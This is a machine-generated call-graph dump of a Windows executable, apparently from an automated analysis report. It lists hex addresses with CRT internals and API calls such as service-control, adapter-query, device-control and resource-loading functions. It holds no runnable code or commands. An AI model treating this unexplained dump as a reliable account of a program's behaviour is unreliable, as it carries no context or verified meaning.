___BuildCatchObject 18671->18672 18673 2c8882d __lock 52 API calls 18672->18673 18674 2c884f7 18673->18674 18675 2c885b0 _doexit 18674->18675 18676 2c88525 RtlDecodePointer 18674->18676 18691 2c885fe 18675->18691 18676->18675 18678 2c8853c RtlDecodePointer 18676->18678 18684 2c8854c 18678->18684 18680 2c8860d ___BuildCatchObject 18680->18670 18682 2c88559 RtlEncodePointer 18682->18684 18683 2c885f5 18685 2c8825c _malloc 3 API calls 18683->18685 18684->18675 18684->18682 18686 2c88569 RtlDecodePointer RtlEncodePointer 18684->18686 18687 2c885fe 18685->18687 18688 2c8857b RtlDecodePointer RtlDecodePointer 18686->18688 18690 2c8860b 18687->18690 18696 2c88997 RtlLeaveCriticalSection 18687->18696 18688->18684 18690->18670 18692 2c88604 18691->18692 18694 2c885de 18691->18694 18697 2c88997 RtlLeaveCriticalSection 18692->18697 18694->18680 18695 2c88997 RtlLeaveCriticalSection 18694->18695 18695->18683 18696->18690 18697->18694 18699 2c890bb RtlSizeHeap 18698->18699 18700 2c890a6 18698->18700 18699->18391 18701 2c85d9b __wctomb_s_l 59 API calls 18700->18701 18702 2c890ab 18701->18702 18703 2c84e35 __wctomb_s_l 9 API calls 18702->18703 18704 2c890b6 18703->18704 18704->18391 18708 2c88a42 18705->18708 18707 2c88a7f 18707->18390 18708->18707 18710 2c902e4 18708->18710 18731 2c89445 Sleep 18708->18731 18711 2c902f8 18710->18711 18712 2c902ed 18710->18712 18714 2c90300 18711->18714 18722 2c9030d 18711->18722 18713 2c82eec _malloc 59 API calls 18712->18713 18715 2c902f5 18713->18715 18716 2c82eb4 _free 59 API calls 18714->18716 18715->18708 18730 2c90308 __dosmaperr 18716->18730 18717 2c90345 18719 2c88143 __calloc_impl RtlDecodePointer 18717->18719 18718 2c90315 RtlReAllocateHeap 18718->18722 18718->18730 18720 2c9034b 18719->18720 18723 2c85d9b __wctomb_s_l 59 API calls 18720->18723 18721 2c90375 18725 2c85d9b __wctomb_s_l 59 API calls 18721->18725 18722->18717 18722->18718 18722->18721 18724 2c88143 __calloc_impl RtlDecodePointer 18722->18724 18727 2c9035d 18722->18727 18723->18730 18724->18722 18726 2c9037a GetLastError 18725->18726 18726->18730 18728 2c85d9b __wctomb_s_l 59 API calls 18727->18728 18729 2c90362 GetLastError 18728->18729 18729->18730 18730->18708 18731->18708 18735 2c88997 RtlLeaveCriticalSection 18732->18735 18734 2c8322e 18734->18381 18735->18734 18736 2ce0702 18737 2d056ab SHGetSpecialFolderPathA 18736->18737 18738 2d056b6 18737->18738 18739 2d0b11c 18740 2d0b3a8 18739->18740 18744 2c7f8da LoadLibraryA 18740->18744 18741 2d0b3ad 18743 2c7f8da 64 API calls 18741->18743 18743->18741 18745 2c7f903 GetProcAddress 18744->18745 18746 2c7f9bd 18744->18746 18747 2c7f9b6 FreeLibrary 18745->18747 18750 2c7f917 18745->18750 18746->18741 18747->18746 18748 2c7f929 GetAdaptersInfo 18748->18750 18749 2c7f9b1 18749->18747 18750->18748 18750->18749 18750->18750 18752 2c83a8f 18750->18752 18754 2c83a97 18752->18754 18753 2c82eec _malloc 59 API calls 18753->18754 18754->18753 18755 2c83ab1 18754->18755 18756 2c88143 __calloc_impl RtlDecodePointer 18754->18756 18757 2c83ab5 std::exception::exception 18754->18757 18755->18750 18756->18754 18760 2c8449a 18757->18760 18759 2c83adf 18762 2c844b9 RaiseException 18760->18762 18762->18759 18763 40d24e 18764 40d26e GetLocalTime 18763->18764 18768 401f27 18764->18768 18766 4028ea StartServiceCtrlDispatcherA 18769 401f3c __common_dcos_data 18768->18769 18772 401a1d 18769->18772 18771 401f45 18771->18766 18773 401a2c 18772->18773 18778 401a4f CreateFileA 18773->18778 18777 401a3e 18777->18771 18779 401a35 18778->18779 18781 401a7d 18778->18781 18786 401b4b LoadLibraryA 18779->18786 18780 401a98 DeviceIoControl 18780->18781 18781->18780 18783 401b3a CloseHandle 18781->18783 18784 401b0e GetLastError 18781->18784 18795 402ca6 18781->18795 18798 402c98 18781->18798 18783->18779 18784->18781 18784->18783 18787 401c21 18786->18787 18788 401b6e GetProcAddress 18786->18788 18787->18777 18789 401c18 FreeLibrary 18788->18789 18791 401b85 18788->18791 18789->18787 18790 401b95 GetAdaptersInfo 18790->18791 18791->18790 18792 402ca6 7 API calls 18791->18792 18793 401c15 18791->18793 18794 402c98 12 API calls 18791->18794 18792->18791 18793->18789 18794->18791 18801 4030a1 18795->18801 18831 403001 18798->18831 18802 402caf 18801->18802 18803 4030ad 18801->18803 18802->18781 18804 4030b7 18803->18804 18805 4030cd 18803->18805 18807 4030f9 HeapFree 18804->18807 18808 4030c3 18804->18808 18806 4030f8 18805->18806 18810 4030e7 18805->18810 18806->18807 18807->18802 18812 40443e 18808->18812 18818 404ecf 18810->18818 18814 40447c 18812->18814 18817 404732 18812->18817 18813 404678 VirtualFree 18815 4046dc 18813->18815 18814->18813 18814->18817 18816 4046eb VirtualFree HeapFree 18815->18816 18815->18817 18816->18817 18817->18802 18819 404efc 18818->18819 18821 404f12 18818->18821 18819->18821 18822 404db6 18819->18822 18821->18802 18825 404dc3 18822->18825 18823 404e73 18823->18821 18824 404de4 VirtualFree 18824->18825 18825->18823 18825->18824 18827 404d60 VirtualFree 18825->18827 18828 404d7d 18827->18828 18829 404dad 18828->18829 18830 404d8d HeapFree 18828->18830 18829->18825 18830->18825 18832 402ca3 18831->18832 18834 403008 18831->18834 18832->18781 18834->18832 18835 40302d 18834->18835 18836 40303c 18835->18836 18842 403051 18835->18842 18838 40304a 18836->18838 18844 404767 18836->18844 18839 403090 HeapAlloc 18838->18839 18840 40309f 18838->18840 18841 40304f 18838->18841 18839->18840 18840->18834 18841->18834 18842->18838 18842->18839 18850 404f14 18842->18850 18846 404799 18844->18846 18845 404838 18849 404847 18845->18849 18864 404b21 18845->18864 18846->18845 18846->18849 18857 404a70 18846->18857 18849->18838 18851 404f22 18850->18851 18852 40500e VirtualAlloc 18851->18852 18853 4050e3 18851->18853 18856 404fdf __common_dcos_data 18851->18856 18852->18856 18868 404c1c 18853->18868 18856->18838 18858 404ab3 HeapAlloc 18857->18858 18859 404a83 HeapReAlloc 18857->18859 18861 404b03 18858->18861 18862 404ad9 VirtualAlloc 18858->18862 18860 404aa2 18859->18860 18859->18861 18860->18858 18861->18845 18862->18861 18863 404af3 HeapFree 18862->18863 18863->18861 18865 404b33 VirtualAlloc 18864->18865 18867 404b7c 18865->18867 18867->18849 18869 404c30 HeapAlloc 18868->18869 18870 404c29 18868->18870 18871 404c4d VirtualAlloc 18869->18871 18876 404c85 __common_dcos_data 18869->18876 18870->18871 18872 404d42 18871->18872 18873 404c6d VirtualAlloc 18871->18873 18874 404d4a HeapFree 18872->18874 18872->18876 18875 404d34 VirtualFree 18873->18875 18873->18876 18874->18876 18875->18872 18876->18856 18995 40222e 18996 4026bc OpenSCManagerA 18995->18996 18997 40d4df 18996->18997 18877 402850 18878 40d7f6 Sleep 18877->18878 18879 40d8e9 18878->18879 18998 402eb0 GetVersion 19022 403ff4 HeapCreate 18998->19022 19000 402f0f 19001 402f14 19000->19001 19002 402f1c 19000->19002 19097 402fcb 19001->19097 19034 403cd4 19002->19034 19006 402f24 GetCommandLineA 19048 403ba2 19006->19048 19010 402f3e 19080 40389c 19010->19080 19012 402f43 19013 402f48 GetStartupInfoA 19012->19013 19093 403844 19013->19093 19015 402f5a GetModuleHandleA 19017 402f7e 19015->19017 19103 4035eb 19017->19103 19023 404014 19022->19023 19024 40404a 19022->19024 19110 403eac 19023->19110 19024->19000 19027 404023 19122 4043cb HeapAlloc 19027->19122 19028 404030 19029 40404d 19028->19029 19031 404c1c 5 API calls 19028->19031 19029->19000 19032 40402d 19031->19032 19032->19029 19033 40403e HeapDestroy 19032->19033 19033->19024 19178 402fef 19034->19178 19037 403cf3 GetStartupInfoA 19040 403d3f 19037->19040 19041 403e04 19037->19041 19040->19041 19045 402fef 12 API calls 19040->19045 19047 403db0 19040->19047 19042 403e2b GetStdHandle 19041->19042 19043 403e6b SetHandleCount 19041->19043 19042->19041 19044 403e39 GetFileType 19042->19044 19043->19006 19044->19041 19045->19040 19046 403dd2 GetFileType 19046->19047 19047->19041 19047->19046 19049 403bf0 19048->19049 19050 403bbd GetEnvironmentStringsW 19048->19050 19052 403bc5 19049->19052 19053 403be1 19049->19053 19051 403bd1 GetEnvironmentStrings 19050->19051 19050->19052 19051->19053 19054 402f34 19051->19054 19055 403bfd GetEnvironmentStringsW 19052->19055 19059 403c09 WideCharToMultiByte 19052->19059 19053->19054 19056 403c83 GetEnvironmentStrings 19053->19056 19058 403c8f 19053->19058 19071 403955 19054->19071 19055->19054 19055->19059 19056->19054 19056->19058 19062 402fef 12 API calls 19058->19062 19060 403c3d 19059->19060 19061 403c6f FreeEnvironmentStringsW 19059->19061 19063 402fef 12 API calls 19060->19063 19061->19054 19070 403caa 19062->19070 19064 403c43 19063->19064 19064->19061 19065 403c4c WideCharToMultiByte 19064->19065 19067 403c66 19065->19067 19068 403c5d 19065->19068 19066 403cc0 FreeEnvironmentStringsA 19066->19054 19067->19061 19069 4030a1 7 API calls 19068->19069 19069->19067 19070->19066 19072 403967 19071->19072 19073 40396c GetModuleFileNameA 19071->19073 19207 4061b4 19072->19207 19075 40398f 19073->19075 19076 402fef 12 API calls 19075->19076 19077 4039b0 19076->19077 19078 4039c0 19077->19078 19079 402fa6 7 API calls 19077->19079 19078->19010 19079->19078 19081 4038a9 19080->19081 19084 4038ae 19080->19084 19082 4061b4 19 API calls 19081->19082 19082->19084 19083 402fef 12 API calls 19085 4038db 19083->19085 19084->19083 19086 402fa6 7 API calls 19085->19086 19087 4038ef 19085->19087 19086->19087 19090 403932 19087->19090 19091 402fef 12 API calls 19087->19091 19092 402fa6 7 API calls 19087->19092 19088 4030a1 7 API calls 19089 40393e 19088->19089 19089->19012 19090->19088 19091->19087 19092->19087 19094 40384d 19093->19094 19095 403852 19093->19095 19096 4061b4 19 API calls 19094->19096 19095->19015 19096->19095 19098 402fd4 19097->19098 19099 402fd9 19097->19099 19100 404224 7 API calls 19098->19100 19101 40425d 7 API calls 19099->19101 19100->19099 19102 402fe2 ExitProcess 19101->19102 19231 40360d 19103->19231 19106 4036c0 19107 4036cc 19106->19107 19108 4037f5 UnhandledExceptionFilter 19107->19108 19109 402f98 19107->19109 19108->19109 19124 402d40 19110->19124 19113 403ed5 19114 403eef GetEnvironmentVariableA 19113->19114 19116 403ee7 19113->19116 19115 403fcc 19114->19115 19118 403f0e 19114->19118 19115->19116 19129 403e7f GetModuleHandleA 19115->19129 19116->19027 19116->19028 19119 403f53 GetModuleFileNameA 19118->19119 19120 403f4b 19118->19120 19119->19120 19120->19115 19126 4061d0 19120->19126 19123 4043e7 19122->19123 19123->19032 19125 402d4c GetVersionExA 19124->19125 19125->19113 19125->19114 19131 4061e7 19126->19131 19130 403e96 19129->19130 19130->19116 19133 4061ff 19131->19133 19135 40622f 19133->19135 19138 4053a6 19133->19138 19134 4053a6 6 API calls 19134->19135 19135->19134 19137 4061e3 19135->19137 19142 4073ab 19135->19142 19137->19115 19139 4053c4 19138->19139 19141 4053b8 19138->19141 19148 40670e 19139->19148 19141->19133 19143 4073d6 19142->19143 19147 4073b9 19142->19147 19144 4073f2 19143->19144 19145 4053a6 6 API calls 19143->19145 19144->19147 19160 406857 19144->19160 19145->19144 19147->19135 19149 406757 19148->19149 19150 40673f GetStringTypeW 19148->19150 19152 406782 GetStringTypeA 19149->19152 19153 4067a6 19149->19153 19150->19149 19151 40675b GetStringTypeA 19150->19151 19151->19149 19154 406843 19151->19154 19152->19154 19153->19154 19156 4067bc MultiByteToWideChar 19153->19156 19154->19141 19156->19154 19157 4067e0 __common_dcos_data 19156->19157 19157->19154 19158 40681a MultiByteToWideChar 19157->19158 19158->19154 19159 406833 GetStringTypeW 19158->19159 19159->19154 19161 406887 LCMapStringW 19160->19161 19162 4068a3 19160->19162 19161->19162 19163 4068ab LCMapStringA 19161->19163 19165 406909 19162->19165 19166 4068ec LCMapStringA 19162->19166 19163->19162 19164 4069e5 19163->19164 19164->19147 19165->19164 19167 40691f MultiByteToWideChar 19165->19167 19166->19164 19167->19164 19168 406949 19167->19168 19168->19164 19169 40697f MultiByteToWideChar 19168->19169 19169->19164 19170 406998 LCMapStringW 19169->19170 19170->19164 19171 4069b3 19170->19171 19172 4069b9 19171->19172 19174 4069f9 19171->19174 19172->19164 19173 4069c7 LCMapStringW 19172->19173 19173->19164 19174->19164 19175 406a31 LCMapStringW 19174->19175 19175->19164 19176 406a49 WideCharToMultiByte 19175->19176 19176->19164 19179 403001 12 API calls 19178->19179 19180 402ffe 19179->19180 19180->19037 19181 402fa6 19180->19181 19182 402fb4 19181->19182 19183 402faf 19181->19183 19193 40425d 19182->19193 19187 404224 19183->19187 19188 40422e 19187->19188 19189 40425b 19188->19189 19190 40425d 7 API calls 19188->19190 19189->19182 19191 404245 19190->19191 19192 40425d 7 API calls 19191->19192 19192->19189 19196 404270 19193->19196 19194 402fbd 19194->19037 19195 404387 19199 40439a GetStdHandle WriteFile 19195->19199 19196->19194 19196->19195 19197 4042b0 19196->19197 19197->19194 19198 4042bc GetModuleFileNameA 19197->19198 19200 4042d4 19198->19200 19199->19194 19202 406578 19200->19202 19203 406585 LoadLibraryA 19202->19203 19205 4065c7 19202->19205 19204 406596 GetProcAddress 19203->19204 19203->19205 19204->19205 19206 4065ad GetProcAddress GetProcAddress 19204->19206 19205->19194 19206->19205 19208 4061bd 19207->19208 19209 4061c4 19207->19209 19211 405df0 19208->19211 19209->19073 19218 405f89 19211->19218 19213 405f7d 19213->19209 19216 405e33 GetCPInfo 19217 405e47 19216->19217 19217->19213 19223 40602f GetCPInfo 19217->19223 19219 405fa9 19218->19219 19220 405f99 GetOEMCP 19218->19220 19221 405fae GetACP 19219->19221 19222 405e01 19219->19222 19220->19219 19221->19222 19222->19213 19222->19216 19222->19217 19224 40611a 19223->19224 19225 406052 19223->19225 19224->19213 19226 40670e 6 API calls 19225->19226 19227 4060ce 19226->19227 19228 406857 9 API calls 19227->19228 19229 4060f2 19228->19229 19230 406857 9 API calls 19229->19230 19230->19224 19232 403619 GetCurrentProcess TerminateProcess 19231->19232 19233 40362a 19231->19233 19232->19233 19234 402f87 19233->19234 19235 403694 ExitProcess 19233->19235 19234->19106 18880 2c7f7d6 CreateFileA 18881 2c7f8d2 18880->18881 18885 2c7f807 18880->18885 18882 2c7f81f DeviceIoControl 18882->18885 18883 2c7f8c8 CloseHandle 18883->18881 18884 2c7f894 GetLastError 18884->18883 18884->18885 18885->18882 18885->18883 18885->18884 18886 2c83a8f _Allocate 60 API calls 18885->18886 18886->18885 18887 40d1d1 18890 401f64 FindResourceA 18887->18890 18889 40d1d6 18891 401f86 GetLastError SizeofResource 18890->18891 18896 401f9f 18890->18896 18892 401fa6 LoadResource LockResource GlobalAlloc 18891->18892 18891->18896 18893 401fd2 18892->18893 18894 401ffb GetTickCount 18893->18894 18897 402005 GlobalAlloc 18894->18897 18896->18889 18897->18896 19236 40d071 19240 2c83c52 19236->19240 19241 2c83c5b 19240->19241 19242 2c83c60 19240->19242 19254 2c8b821 19241->19254 19246 2c83c75 19242->19246 19245 40d073 Sleep 19247 2c83c81 ___BuildCatchObject 19246->19247 19251 2c83ccf ___DllMainCRTStartup 19247->19251 19253 2c83d2c ___BuildCatchObject 19247->19253 19258 2c83ae0 19247->19258 19249 2c83d09 19250 2c83ae0 __CRT_INIT@12 138 API calls 19249->19250 19249->19253 19250->19253 19251->19249 19252 2c83ae0 __CRT_INIT@12 138 API calls 19251->19252 19251->19253 19252->19249 19253->19245 19255 2c8b851 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 19254->19255 19256 2c8b844 19254->19256 19257 2c8b848 19255->19257 19256->19255 19256->19257 19257->19242 19259 2c83aec ___BuildCatchObject 19258->19259 19260 2c83b6e 19259->19260 19261 2c83af4 19259->19261 19263 2c83b72 19260->19263 19264 2c83bd7 19260->19264 19306 2c88126 GetProcessHeap 19261->19306 19268 2c83b93 19263->19268 19299 2c83afd ___BuildCatchObject __CRT_INIT@12 19263->19299 19407 2c8839b 19263->19407 19265 2c83c3a 19264->19265 19266 2c83bdc 19264->19266 19265->19299 19438 2c85b64 19265->19438 19269 2c8910b __CRT_INIT@12 TlsGetValue 19266->19269 19267 2c83af9 19267->19299 19307 2c85cd4 19267->19307 19410 2c88272 RtlDecodePointer 19268->19410 19273 2c83be7 19269->19273 19277 2c889ac __calloc_crt 59 API calls 19273->19277 19273->19299 19275 2c83b09 __RTC_Initialize 19283 2c83b19 GetCommandLineA 19275->19283 19275->19299 19279 2c83bf8 19277->19279 19278 2c83ba9 __CRT_INIT@12 19434 2c83bc2 19278->19434 19284 2c8912a __CRT_INIT@12 TlsSetValue 19279->19284 19279->19299 19280 2c8b4bf __ioterm 60 API calls 19282 2c83ba4 19280->19282 19285 2c85d4a __mtterm 62 API calls 19282->19285 19328 2c8b8bd GetEnvironmentStringsW 19283->19328 19287 2c83c10 19284->19287 19285->19278 19289 2c83c2e 19287->19289 19290 2c83c16 19287->19290 19293 2c82eb4 _free 59 API calls 19289->19293 19292 2c85c21 __initptd 59 API calls 19290->19292 19295 2c83c1e GetCurrentThreadId 19292->19295 19293->19299 19294 2c83b33 19296 2c83b37 19294->19296 19360 2c8b511 19294->19360 19295->19299 19393 2c85d4a 19296->19393 19299->19251 19301 2c83b57 19301->19299 19402 2c8b4bf 19301->19402 19306->19267 19446 2c88442 RtlEncodePointer 19307->19446 19309 2c85cd9 19451 2c8895e 19309->19451 19312 2c85ce2 19313 2c85d4a __mtterm 62 API calls 19312->19313 19315 2c85ce7 19313->19315 19315->19275 19317 2c85cff 19318 2c889ac __calloc_crt 59 API calls 19317->19318 19319 2c85d0c 19318->19319 19320 2c85d41 19319->19320 19322 2c8912a __CRT_INIT@12 TlsSetValue 19319->19322 19321 2c85d4a __mtterm 62 API calls 19320->19321 19323 2c85d46 19321->19323 19324 2c85d20 19322->19324 19323->19275 19324->19320 19325 2c85d26 19324->19325 19326 2c85c21 __initptd 59 API calls 19325->19326 19327 2c85d2e GetCurrentThreadId 19326->19327 19327->19275 19330 2c8b8d0 WideCharToMultiByte 19328->19330 19333 2c83b29 19328->19333 19331 2c8b93a FreeEnvironmentStringsW 19330->19331 19332 2c8b903 19330->19332 19331->19333 19334 2c889f4 __malloc_crt 59 API calls 19332->19334 19341 2c8b20b 19333->19341 19335 2c8b909 19334->19335 19335->19331 19336 2c8b910 WideCharToMultiByte 19335->19336 19337 2c8b92f FreeEnvironmentStringsW 19336->19337 19338 2c8b926 19336->19338 19337->19333 19339 2c82eb4 _free 59 API calls 19338->19339 19340 2c8b92c 19339->19340 19340->19337 19342 2c8b217 ___BuildCatchObject 19341->19342 19343 2c8882d __lock 59 API calls 19342->19343 19344 2c8b21e 19343->19344 19345 2c889ac __calloc_crt 59 API calls 19344->19345 19346 2c8b22f 19345->19346 19347 2c8b29a GetStartupInfoW 19346->19347 19348 2c8b23a ___BuildCatchObject @_EH4_CallFilterFunc@8 19346->19348 19354 2c8b2af 19347->19354 19357 2c8b3de 19347->19357 19348->19294 19349 2c8b4a6 19459 2c8b4b6 19349->19459 19351 2c889ac __calloc_crt 59 API calls 19351->19354 19352 2c8b42b GetStdHandle 19352->19357 19353 2c8b43e GetFileType 19353->19357 19354->19351 19355 2c8b2fd 19354->19355 19354->19357 19356 2c8b331 GetFileType 19355->19356 19355->19357 19358 2c8914c ___lock_fhandle InitializeCriticalSectionAndSpinCount 19355->19358 19356->19355 19357->19349 19357->19352 19357->19353 19359 2c8914c ___lock_fhandle InitializeCriticalSectionAndSpinCount 19357->19359 19358->19355 19359->19357 19361 2c8b51f 19360->19361 19362 2c8b524 GetModuleFileNameA 19360->19362 19469 2c851ca 19361->19469 19363 2c8b551 19362->19363 19463 2c8b5c4 19363->19463 19366 2c83b43 19366->19301 19371 2c8b740 19366->19371 19368 2c889f4 __malloc_crt 59 API calls 19369 2c8b58a 19368->19369 19369->19366 19370 2c8b5c4 _parse_cmdline 59 API calls 19369->19370 19370->19366 19372 2c8b749 19371->19372 19374 2c8b74e _strlen 19371->19374 19373 2c851ca ___initmbctable 71 API calls 19372->19373 19373->19374 19375 2c889ac __calloc_crt 59 API calls 19374->19375 19378 2c83b4c 19374->19378 19376 2c8b784 _strlen 19375->19376 19376->19378 19379 2c889ac __calloc_crt 59 API calls 19376->19379 19380 2c8b7d6 19376->19380 19381 2c8b7fd 19376->19381 19384 2c8b814 19376->19384 19633 2c86bfc 19376->19633 19377 2c82eb4 _free 59 API calls 19377->19378 19378->19301 19387 2c883aa 19378->19387 19379->19376 19380->19377 19383 2c82eb4 _free 59 API calls 19381->19383 19383->19378 19385 2c84e45 __invoke_watson 8 API calls 19384->19385 19386 2c8b820 19385->19386 19388 2c883b6 __IsNonwritableInCurrentImage 19387->19388 19642 2c8d21f 19388->19642 19390 2c883d4 __initterm_e 19391 2c832e7 __cinit 68 API calls 19390->19391 19392 2c883f3 _doexit __IsNonwritableInCurrentImage 19390->19392 19391->19392 19392->19301 19394 2c85d5a 19393->19394 19395 2c85d54 19393->19395 19397 2c88877 RtlDeleteCriticalSection 19394->19397 19398 2c88893 19394->19398 19645 2c890ec 19395->19645 19399 2c82eb4 _free 59 API calls 19397->19399 19400 2c8889f RtlDeleteCriticalSection 19398->19400 19401 2c888b2 19398->19401 19399->19394 19400->19398 19401->19299 19404 2c8b4c6 19402->19404 19403 2c8b50e 19403->19296 19404->19403 19405 2c82eb4 _free 59 API calls 19404->19405 19406 2c8b4df RtlDeleteCriticalSection 19404->19406 19405->19404 19406->19404 19408 2c884e4 _doexit 59 API calls 19407->19408 19409 2c883a6 19408->19409 19409->19268 19411 2c8828c 19410->19411 19412 2c8829e 19410->19412 19411->19412 19414 2c82eb4 _free 59 API calls 19411->19414 19413 2c82eb4 _free 59 API calls 19412->19413 19415 2c882ab 19413->19415 19414->19411 19416 2c882cf 19415->19416 19418 2c82eb4 _free 59 API calls 19415->19418 19417 2c82eb4 _free 59 API calls 19416->19417 19419 2c882db 19417->19419 19418->19415 19420 2c82eb4 _free 59 API calls 19419->19420 19421 2c882ec 19420->19421 19422 2c82eb4 _free 59 API calls 19421->19422 19423 2c882f7 19422->19423 19424 2c8831c RtlEncodePointer 19423->19424 19429 2c82eb4 _free 59 API calls 19423->19429 19425 2c88337 19424->19425 19426 2c88331 19424->19426 19428 2c8834d 19425->19428 19430 2c82eb4 _free 59 API calls 19425->19430 19427 2c82eb4 _free 59 API calls 19426->19427 19427->19425 19431 2c83b98 19428->19431 19433 2c82eb4 _free 59 API calls 19428->19433 19432 2c8831b 19429->19432 19430->19428 19431->19278 19431->19280 19432->19424 19433->19431 19435 2c83bd4 19434->19435 19436 2c83bc6 19434->19436 19435->19299 19436->19435 19437 2c85d4a __mtterm 62 API calls 19436->19437 19437->19435 19439 2c85b71 19438->19439 19445 2c85b97 19438->19445 19440 2c85b7f 19439->19440 19441 2c8910b __CRT_INIT@12 TlsGetValue 19439->19441 19442 2c8912a __CRT_INIT@12 TlsSetValue 19440->19442 19441->19440 19443 2c85b8f 19442->19443 19648 2c85a2f 19443->19648 19445->19299 19447 2c88453 __init_pointers __initp_misc_winsig 19446->19447 19458 2c8394a RtlEncodePointer 19447->19458 19449 2c8846b __init_pointers 19450 2c891ba 34 API calls 19449->19450 19450->19309 19452 2c8896a 19451->19452 19453 2c8914c ___lock_fhandle InitializeCriticalSectionAndSpinCount 19452->19453 19454 2c85cde 19452->19454 19453->19452 19454->19312 19455 2c890ce 19454->19455 19456 2c890e5 TlsAlloc 19455->19456 19457 2c85cf4 19455->19457 19457->19312 19457->19317 19458->19449 19462 2c88997 RtlLeaveCriticalSection 19459->19462 19461 2c8b4bd 19461->19348 19462->19461 19465 2c8b5e6 19463->19465 19468 2c8b64a 19465->19468 19473 2c91516 19465->19473 19466 2c8b567 19466->19366 19466->19368 19467 2c91516 _parse_cmdline 59 API calls 19467->19468 19468->19466 19468->19467 19470 2c851d3 19469->19470 19471 2c851da 19469->19471 19529 2c85527 19470->19529 19471->19362 19476 2c914bc 19473->19476 19479 2c821bb 19476->19479 19480 2c821cc 19479->19480 19481 2c82219 19479->19481 19487 2c85b9a 19480->19487 19481->19465 19483 2c821d2 19484 2c821f9 19483->19484 19492 2c850ff 19483->19492 19484->19481 19507 2c85481 19484->19507 19488 2c85bb2 __getptd_noexit 59 API calls 19487->19488 19489 2c85ba0 19488->19489 19490 2c85bad 19489->19490 19491 2c8837f __amsg_exit 59 API calls 19489->19491 19490->19483 19491->19490 19493 2c8510b ___BuildCatchObject 19492->19493 19494 2c85b9a __beginthreadex 59 API calls 19493->19494 19495 2c85114 19494->19495 19496 2c85143 19495->19496 19497 2c85127 19495->19497 19498 2c8882d __lock 59 API calls 19496->19498 19499 2c85b9a __beginthreadex 59 API calls 19497->19499 19500 2c8514a 19498->19500 19502 2c8512c 19499->19502 19519 2c8517f 19500->19519 19505 2c8837f __amsg_exit 59 API calls 19502->19505 19506 2c8513a ___BuildCatchObject 19502->19506 19505->19506 19506->19484 19508 2c8548d ___BuildCatchObject 19507->19508 19509 2c85b9a __beginthreadex 59 API calls 19508->19509 19510 2c85497 19509->19510 19511 2c8882d __lock 59 API calls 19510->19511 19516 2c854a9 19510->19516 19512 2c854c7 19511->19512 19517 2c82eb4 _free 59 API calls 19512->19517 19518 2c854f4 19512->19518 19513 2c8837f __amsg_exit 59 API calls 19515 2c854b7 ___BuildCatchObject 19513->19515 19515->19481 19516->19513 19516->19515 19517->19518 19526 2c8551e 19518->19526 19520 2c8518a ___addlocaleref ___removelocaleref 19519->19520 19521 2c8515e 19519->19521 19520->19521 19522 2c84f05 ___freetlocinfo 59 API calls 19520->19522 19523 2c85176 19521->19523 19522->19521 19524 2c88997 _doexit RtlLeaveCriticalSection 19523->19524 19525 2c8517d 19524->19525 19525->19502 19527 2c88997 _doexit RtlLeaveCriticalSection 19526->19527 19528 2c85525 19527->19528 19528->19516 19530 2c85533 ___BuildCatchObject 19529->19530 19531 2c85b9a __beginthreadex 59 API calls 19530->19531 19532 2c8553b 19531->19532 19533 2c85481 _LocaleUpdate::_LocaleUpdate 59 API calls 19532->19533 19534 2c85545 19533->19534 19554 2c85222 19534->19554 19537 2c889f4 __malloc_crt 59 API calls 19538 2c85567 19537->19538 19539 2c85694 ___BuildCatchObject 19538->19539 19561 2c856cf 19538->19561 19539->19471 19542 2c856a4 19542->19539 19543 2c856b7 19542->19543 19546 2c82eb4 _free 59 API calls 19542->19546 19547 2c85d9b __wctomb_s_l 59 API calls 19543->19547 19544 2c8559d 19545 2c855bd 19544->19545 19548 2c82eb4 _free 59 API calls 19544->19548 19545->19539 19549 2c8882d __lock 59 API calls 19545->19549 19546->19543 19547->19539 19548->19545 19550 2c855ec 19549->19550 19551 2c8567a 19550->19551 19553 2c82eb4 _free 59 API calls 19550->19553 19571 2c85699 19551->19571 19553->19551 19555 2c821bb _LocaleUpdate::_LocaleUpdate 59 API calls 19554->19555 19556 2c85232 19555->19556 19557 2c85241 GetOEMCP 19556->19557 19558 2c85253 19556->19558 19559 2c8526a 19557->19559 19558->19559 19560 2c85258 GetACP 19558->19560 19559->19537 19559->19539 19560->19559 19562 2c85222 getSystemCP 61 API calls 19561->19562 19563 2c856ec 19562->19563 19566 2c8573d IsValidCodePage 19563->19566 19568 2c856f3 setSBCS 19563->19568 19570 2c85762 __wctomb_s_l __setmbcp_nolock 19563->19570 19564 2c8448b __87except 6 API calls 19565 2c8558e 19564->19565 19565->19542 19565->19544 19567 2c8574f GetCPInfo 19566->19567 19566->19568 19567->19568 19567->19570 19568->19564 19574 2c852ef GetCPInfo 19570->19574 19632 2c88997 RtlLeaveCriticalSection 19571->19632 19573 2c856a0 19573->19539 19575 2c85327 19574->19575 19583 2c853d1 19574->19583 19584 2c8db5d 19575->19584 19577 2c8448b __87except 6 API calls 19579 2c8547d 19577->19579 19579->19568 19582 2c8da01 ___crtLCMapStringA 63 API calls 19582->19583 19583->19577 19585 2c821bb _LocaleUpdate::_LocaleUpdate 59 API calls 19584->19585 19586 2c8db6e 19585->19586 19594 2c8da65 19586->19594 19589 2c8da01 19590 2c821bb _LocaleUpdate::_LocaleUpdate 59 API calls 19589->19590 19591 2c8da12 19590->19591 19607 2c8d7fd 19591->19607 19595 2c8da8c MultiByteToWideChar 19594->19595 19596 2c8da7f 19594->19596 19597 2c8dab8 19595->19597 19606 2c8dab1 19595->19606 19596->19595 19600 2c82eec _malloc 59 API calls 19597->19600 19605 2c8dada __wctomb_s_l 19597->19605 19598 2c8448b __87except 6 API calls 19599 2c85388 19598->19599 19599->19589 19600->19605 19601 2c8db16 MultiByteToWideChar 19602 2c8db40 19601->19602 19603 2c8db30 GetStringTypeW 19601->19603 19604 2c8da47 __freea 59 API calls 19602->19604 19603->19602 19604->19606 19605->19601 19605->19606 19606->19598 19609 2c8d816 MultiByteToWideChar 19607->19609 19610 2c8d875 19609->19610 19613 2c8d87c 19609->19613 19611 2c8448b __87except 6 API calls 19610->19611 19614 2c853a9 19611->19614 19612 2c8d8db MultiByteToWideChar 19615 2c8d942 19612->19615 19616 2c8d8f4 19612->19616 19619 2c82eec _malloc 59 API calls 19613->19619 19621 2c8d8a4 19613->19621 19614->19582 19618 2c8da47 __freea 59 API calls 19615->19618 19617 2c8f628 __crtLCMapStringA_stat LCMapStringW 19616->19617 19620 2c8d908 19617->19620 19618->19610 19619->19621 19620->19615 19622 2c8d91e 19620->19622 19623 2c8d94a 19620->19623 19621->19610 19621->19612 19622->19615 19624 2c8f628 __crtLCMapStringA_stat LCMapStringW 19622->19624 